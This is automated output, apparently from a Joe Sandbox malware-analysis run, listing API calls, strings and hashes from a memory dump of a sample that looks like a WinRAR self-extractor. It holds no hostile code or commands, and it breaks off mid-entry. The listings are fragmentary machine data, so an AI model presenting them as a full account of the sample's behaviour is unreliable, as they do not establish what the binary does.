                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                                    • String ID: $%s:$CAPTION$d
                                                                                                                    • API String ID: 2407758923-2512411981
                                                                                                                    APIs
                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 0006CB66
                                                                                                                      • Part of subcall function 0006C701: _free.LIBCMT ref: 0006C71E
                                                                                                                      • Part of subcall function 0006C701: _free.LIBCMT ref: 0006C730
                                                                                                                      • Part of subcall function 0006C701: _free.LIBCMT ref: 0006C742
                                                                                                                      • Part of subcall function 0006C701: _free.LIBCMT ref: 0006C754
                                                                                                                      • Part of subcall function 0006C701: _free.LIBCMT ref: 0006C766
                                                                                                                      • Part of subcall function 0006C701: _free.LIBCMT ref: 0006C778
                                                                                                                      • Part of subcall function 0006C701: _free.LIBCMT ref: 0006C78A
                                                                                                                      • Part of subcall function 0006C701: _free.LIBCMT ref: 0006C79C
                                                                                                                      • Part of subcall function 0006C701: _free.LIBCMT ref: 0006C7AE
                                                                                                                      • Part of subcall function 0006C701: _free.LIBCMT ref: 0006C7C0
                                                                                                                      • Part of subcall function 0006C701: _free.LIBCMT ref: 0006C7D2
                                                                                                                      • Part of subcall function 0006C701: _free.LIBCMT ref: 0006C7E4
                                                                                                                      • Part of subcall function 0006C701: _free.LIBCMT ref: 0006C7F6
                                                                                                                    • _free.LIBCMT ref: 0006CB5B
                                                                                                                      • Part of subcall function 00068DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0006C896,?,00000000,?,00000000,?,0006C8BD,?,00000007,?,?,0006CCBA,?), ref: 00068DE2
                                                                                                                      • Part of subcall function 00068DCC: GetLastError.KERNEL32(?,?,0006C896,?,00000000,?,00000000,?,0006C8BD,?,00000007,?,?,0006CCBA,?,?), ref: 00068DF4
                                                                                                                    • _free.LIBCMT ref: 0006CB7D
                                                                                                                    • _free.LIBCMT ref: 0006CB92
                                                                                                                    • _free.LIBCMT ref: 0006CB9D
                                                                                                                    • _free.LIBCMT ref: 0006CBBF
                                                                                                                    • _free.LIBCMT ref: 0006CBD2
                                                                                                                    • _free.LIBCMT ref: 0006CBE0
                                                                                                                    • _free.LIBCMT ref: 0006CBEB
                                                                                                                    • _free.LIBCMT ref: 0006CC23
                                                                                                                    • _free.LIBCMT ref: 0006CC2A
                                                                                                                    • _free.LIBCMT ref: 0006CC47
                                                                                                                    • _free.LIBCMT ref: 0006CC5F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 161543041-0
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00059736
                                                                                                                    • _wcslen.LIBCMT ref: 000597D6
                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 000597E5
                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00059806
                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0005982D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                                                    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                    • API String ID: 1777411235-4209811716
                                                                                                                    APIs
                                                                                                                    • GetWindow.USER32(?,00000005), ref: 0005D6C1
                                                                                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 0005D6ED
                                                                                                                      • Part of subcall function 00051FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0004C116,00000000,.exe,?,?,00000800,?,?,?,00058E3C), ref: 00051FD1
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0005D709
                                                                                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0005D720
                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0005D734
                                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0005D75D
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0005D764
                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0005D76D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                                    • String ID: STATIC
                                                                                                                    • API String ID: 3820355801-1882779555
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00069705
                                                                                                                      • Part of subcall function 00068DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0006C896,?,00000000,?,00000000,?,0006C8BD,?,00000007,?,?,0006CCBA,?), ref: 00068DE2
                                                                                                                      • Part of subcall function 00068DCC: GetLastError.KERNEL32(?,?,0006C896,?,00000000,?,00000000,?,0006C8BD,?,00000007,?,?,0006CCBA,?,?), ref: 00068DF4
                                                                                                                    • _free.LIBCMT ref: 00069711
                                                                                                                    • _free.LIBCMT ref: 0006971C
                                                                                                                    • _free.LIBCMT ref: 00069727
                                                                                                                    • _free.LIBCMT ref: 00069732
                                                                                                                    • _free.LIBCMT ref: 0006973D
                                                                                                                    • _free.LIBCMT ref: 00069748
                                                                                                                    • _free.LIBCMT ref: 00069753
                                                                                                                    • _free.LIBCMT ref: 0006975E
                                                                                                                    • _free.LIBCMT ref: 0006976C
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                                    • String ID: csm$csm$csm
                                                                                                                    • API String ID: 322700389-393685449
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00046FAA
                                                                                                                    • _wcslen.LIBCMT ref: 00047013
                                                                                                                    • _wcslen.LIBCMT ref: 00047084
                                                                                                                      • Part of subcall function 00047A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00047AAB
                                                                                                                      • Part of subcall function 00047A9C: GetLastError.KERNEL32 ref: 00047AF1
                                                                                                                      • Part of subcall function 00047A9C: CloseHandle.KERNEL32(?), ref: 00047B00
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                    • API String ID: 3122303884-3508440684
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00041316: GetDlgItem.USER32(00000000,00003021), ref: 0004135A
                                                                                                                      • Part of subcall function 00041316: SetWindowTextW.USER32(00000000,000735F4), ref: 00041370
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0005B610
                                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0005B637
                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0005B650
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0005B661
                                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 0005B66A
                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0005B67E
                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0005B694
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                                    • String ID: LICENSEDLG
                                                                                                                    • API String ID: 3214253823-2177901306
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,455F76DE,00000001,00000000,00000000,?,?,0004AF6C,ROOT\CIMV2), ref: 0005FD99
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0004AF6C,ROOT\CIMV2), ref: 0005FE14
                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0005FE1F
                                                                                                                    • _com_issue_error.COMSUPP ref: 0005FE48
                                                                                                                    • _com_issue_error.COMSUPP ref: 0005FE52
                                                                                                                    • GetLastError.KERNEL32(80070057,455F76DE,00000001,00000000,00000000,?,?,0004AF6C,ROOT\CIMV2), ref: 0005FE57
                                                                                                                    • _com_issue_error.COMSUPP ref: 0005FE6A
                                                                                                                    • GetLastError.KERNEL32(00000000,?,?,0004AF6C,ROOT\CIMV2), ref: 0005FE80
                                                                                                                    • _com_issue_error.COMSUPP ref: 0005FE93
                                                                                                                    Similarity
                                                                                                                    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1353541977-0
                                                                                                                    • Opcode ID: 6a48c26050227d4f158f56bd8c8ea4560491fecaf1794b70ad17acdf7e37f9d4
                                                                                                                    • Instruction ID: 5e88a2411abe865e7d81e8860a42922da4d158b1d595d992bb7b638a547355af
                                                                                                                    • Opcode Fuzzy Hash: 6a48c26050227d4f158f56bd8c8ea4560491fecaf1794b70ad17acdf7e37f9d4
                                                                                                                    • Instruction Fuzzy Hash: DB41E771A0020AABDB109F64DC46BFFBBA9EB44711F104239FD09E7292D73C994487E5
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                                                    • API String ID: 3519838083-3505469590
                                                                                                                    • Opcode ID: 94d80dfd355aa6b781bcb9f3e09f199848b04d365cd70aeeb878c46e4c94f527
                                                                                                                    • Instruction ID: b85b5b55a530822072e03a4e753f844e0388931d6a9db0e90bf45cf8d4d37752
                                                                                                                    • Opcode Fuzzy Hash: 94d80dfd355aa6b781bcb9f3e09f199848b04d365cd70aeeb878c46e4c94f527
                                                                                                                    • Instruction Fuzzy Hash: C1717CB0B00219EFEB14DFA4CC959AEB7B9FF49310B044169F516A72A1CB34AE42DB54
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00049387
                                                                                                                    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 000493AA
                                                                                                                    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 000493C9
                                                                                                                      • Part of subcall function 0004C29A: _wcslen.LIBCMT ref: 0004C2A2
                                                                                                                      • Part of subcall function 00051FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0004C116,00000000,.exe,?,?,00000800,?,?,?,00058E3C), ref: 00051FD1
                                                                                                                    • _swprintf.LIBCMT ref: 00049465
                                                                                                                      • Part of subcall function 00044092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000440A5
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 000494D4
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00049514
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                                                    • String ID: rtmp%d
                                                                                                                    • API String ID: 3726343395-3303766350
                                                                                                                    • Opcode ID: 0eb02db52b7f885264deed527c36332152bb07f0c8a43dc83e0fe19bcac74709
                                                                                                                    • Instruction ID: 6c5e383569e63c6033c60e95c5d5ccb0cf79663d9c8a1754f7f893272bcdcd60
                                                                                                                    • Opcode Fuzzy Hash: 0eb02db52b7f885264deed527c36332152bb07f0c8a43dc83e0fe19bcac74709
                                                                                                                    • Instruction Fuzzy Hash: B741B2F1901258A6DF61EBA0CD55EEF737CAF41340F1048B5B649E3052EB788BC99B68
                                                                                                                    APIs
                                                                                                                    • __aulldiv.LIBCMT ref: 0005122E
                                                                                                                      • Part of subcall function 0004B146: GetVersionExW.KERNEL32(?), ref: 0004B16B
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00051251
                                                                                                                    • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00051263
                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00051274
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00051284
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00051294
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 000512CF
                                                                                                                    • __aullrem.LIBCMT ref: 00051379
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1247370737-0
                                                                                                                    • Opcode ID: b4cfc98c6fcd48d267c032519759a323fc6c34d57de91ed9a942b7ea21d1c1e6
                                                                                                                    • Instruction ID: bab263dcb6ef7630c17be8421d7c4b39e0e7257f1f0d475dfb44facc70e35667
                                                                                                                    • Opcode Fuzzy Hash: b4cfc98c6fcd48d267c032519759a323fc6c34d57de91ed9a942b7ea21d1c1e6
                                                                                                                    • Instruction Fuzzy Hash: 52413DB15083059FD710DF65C8849ABBBF9FF88315F40892EF99AD2210E738E649DB51
                                                                                                                    APIs
                                                                                                                    • _swprintf.LIBCMT ref: 00042536
                                                                                                                      • Part of subcall function 00044092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000440A5
                                                                                                                      • Part of subcall function 000505DA: _wcslen.LIBCMT ref: 000505E0
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                                                    • String ID: ;%u$x%u$xc%u
                                                                                                                    • API String ID: 3053425827-2277559157
                                                                                                                    • Opcode ID: f29f8a1f08a5f95a6e6bb03761acbabfcc8e14194ddfc7f519bea679598cccc1
                                                                                                                    • Instruction ID: 473bfdd0e5e4b29d1da965cf4b069fe2aa517b596011192ae8fef439ddeeb0e3
                                                                                                                    • Opcode Fuzzy Hash: f29f8a1f08a5f95a6e6bb03761acbabfcc8e14194ddfc7f519bea679598cccc1
                                                                                                                    • Instruction Fuzzy Hash: 63F132F07052409ADB24EF2488D5BEE77DA6B80300F48457DFC8A9B283DB649949C76A
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: </p>$</style>$<br>$<style>$>
                                                                                                                    • API String ID: 176396367-3568243669
                                                                                                                    • Opcode ID: 02c5a8d7cf63b9edacf620db1c0a1fd29cd726c2b1766269e490b4ed1cf97884
                                                                                                                    • Instruction ID: 6783b03b26e2c9fce017a520ee037397e74cb437a70f2b07dda5c493dfb20557
                                                                                                                    • Opcode Fuzzy Hash: 02c5a8d7cf63b9edacf620db1c0a1fd29cd726c2b1766269e490b4ed1cf97884
                                                                                                                    • Instruction Fuzzy Hash: 58514466700323D1DB709A299C127B773F5DFA1792F69042AFDC18B2C1FBA58C898271
                                                                                                                    APIs
                                                                                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0006FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 0006F6CF
                                                                                                                    • __fassign.LIBCMT ref: 0006F74A
                                                                                                                    • __fassign.LIBCMT ref: 0006F765
                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0006F78B
                                                                                                                    • WriteFile.KERNEL32(?,00000000,00000000,0006FE02,00000000,?,?,?,?,?,?,?,?,?,0006FE02,00000000), ref: 0006F7AA
                                                                                                                    • WriteFile.KERNEL32(?,00000000,00000001,0006FE02,00000000,?,?,?,?,?,?,?,?,?,0006FE02,00000000), ref: 0006F7E3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1324828854-0
                                                                                                                    • Opcode ID: b7fac9ac33d2a5b25907a1a9682c08158a0d4ffae47198cb8518eda26087780e
                                                                                                                    • Instruction ID: 23dd5c2e1e00c6cc731e7bc47e34f768745cf3869d83b75ed1b843e67bb30f87
                                                                                                                    • Opcode Fuzzy Hash: b7fac9ac33d2a5b25907a1a9682c08158a0d4ffae47198cb8518eda26087780e
                                                                                                                    • Instruction Fuzzy Hash: 695177B1D0024A9FDB10CFA8EC45AEEBBFAFF09310F14416AE555E7251D774AA41CBA0
                                                                                                                    APIs
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00062937
                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0006293F
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 000629C8
                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 000629F3
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00062A48
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                    • String ID: csm
                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                    • Opcode ID: 5577cc0f7e0ba512c60646f5ab129e6f99dc58961d7427f49826ce25d6fa2c77
                                                                                                                    • Instruction ID: f5407d2d0298f38d8dc876fc9e526d95cafa912320ae134bf619fd0bfe06b26b
                                                                                                                    • Opcode Fuzzy Hash: 5577cc0f7e0ba512c60646f5ab129e6f99dc58961d7427f49826ce25d6fa2c77
                                                                                                                    • Instruction Fuzzy Hash: B041A134E00608AFCF10DF68C885ADEBBF6AF44324F148055E819AB393DB759A55CFA1
                                                                                                                    APIs
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00059EEE
                                                                                                                    • GetWindowRect.USER32(?,00000000), ref: 00059F44
                                                                                                                    • ShowWindow.USER32(?,00000005,00000000), ref: 00059FDB
                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00059FE3
                                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00059FF9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Show$RectText
                                                                                                                    • String ID: RarHtmlClassName
                                                                                                                    • API String ID: 3937224194-1658105358
                                                                                                                    • Opcode ID: 4b7688a97921b295908884e030d44bc43480d437ac2c6775cedeba16925355ff
                                                                                                                    • Instruction ID: 245dfc77c54b9b83a20d1dbd52ca2b75ae77f107fba044622227c7d77a890c84
                                                                                                                    • Opcode Fuzzy Hash: 4b7688a97921b295908884e030d44bc43480d437ac2c6775cedeba16925355ff
                                                                                                                    • Instruction Fuzzy Hash: 3741C031104610EFDB615F64DC4DB6BBFA8FF49702F004669FD499A096CB38DA49CB61
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                    • API String ID: 176396367-3743748572
                                                                                                                    • Opcode ID: 3ea502bc8d4c1cd677f19b3202499c778405c9ebd0ec99652a4082629be525ac
                                                                                                                    • Instruction ID: 633aec8f630fde07daf6cf8ec3b5682cb4a9916d73b03319a95e5062cc8a1330
                                                                                                                    • Opcode Fuzzy Hash: 3ea502bc8d4c1cd677f19b3202499c778405c9ebd0ec99652a4082629be525ac
                                                                                                                    • Instruction Fuzzy Hash: BC317032644345D6DA30AB549C42BBB73E8EB90321F50842FFC86872C1FB65AD4883F6
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0006C868: _free.LIBCMT ref: 0006C891
                                                                                                                    • _free.LIBCMT ref: 0006C8F2
                                                                                                                      • Part of subcall function 00068DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0006C896,?,00000000,?,00000000,?,0006C8BD,?,00000007,?,?,0006CCBA,?), ref: 00068DE2
                                                                                                                      • Part of subcall function 00068DCC: GetLastError.KERNEL32(?,?,0006C896,?,00000000,?,00000000,?,0006C8BD,?,00000007,?,?,0006CCBA,?,?), ref: 00068DF4
                                                                                                                    • _free.LIBCMT ref: 0006C8FD
                                                                                                                    • _free.LIBCMT ref: 0006C908
                                                                                                                    • _free.LIBCMT ref: 0006C95C
                                                                                                                    • _free.LIBCMT ref: 0006C967
                                                                                                                    • _free.LIBCMT ref: 0006C972
                                                                                                                    • _free.LIBCMT ref: 0006C97D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                    • Instruction ID: a7a758ada26351d4d35c6e347f9d0c42419859ccdb23f51a93dd3c185491672e
                                                                                                                    • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                    • Instruction Fuzzy Hash: 96110D71580B04AAE630B7B2CC07FDB7BAE9F06B00F404D16B2DD67093DE65A505C760
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0005E669,0005E5CC,0005E86D), ref: 0005E605
                                                                                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0005E61B
                                                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0005E630
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                    • API String ID: 667068680-1718035505
                                                                                                                    • Opcode ID: 8bbbd7c575080f2b356c65589a1a22e5a39db27f6d5059f88a5d9ce670cb29c1
                                                                                                                    • Instruction ID: 8af607722d8e4f192eb6107abf52e7a7adb8ba4ac7bcb3ea29f65a665b24ae8c
                                                                                                                    • Opcode Fuzzy Hash: 8bbbd7c575080f2b356c65589a1a22e5a39db27f6d5059f88a5d9ce670cb29c1
                                                                                                                    • Instruction Fuzzy Hash: 16F0C831B40BB25B6F694E64DC946EB22C86B267D33004439DD89D7140EB5CCF589794
                                                                                                                    APIs
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 000514C2
                                                                                                                      • Part of subcall function 0004B146: GetVersionExW.KERNEL32(?), ref: 0004B16B
                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 000514E6
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00051500
                                                                                                                    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00051513
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00051523
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00051533
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2092733347-0
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,?,00062AF1,000602FC,0005FA34), ref: 00062B08
                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00062B16
                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00062B2F
                                                                                                                    • SetLastError.KERNEL32(00000000,00062AF1,000602FC,0005FA34), ref: 00062B81
                                                                                                                    Similarity
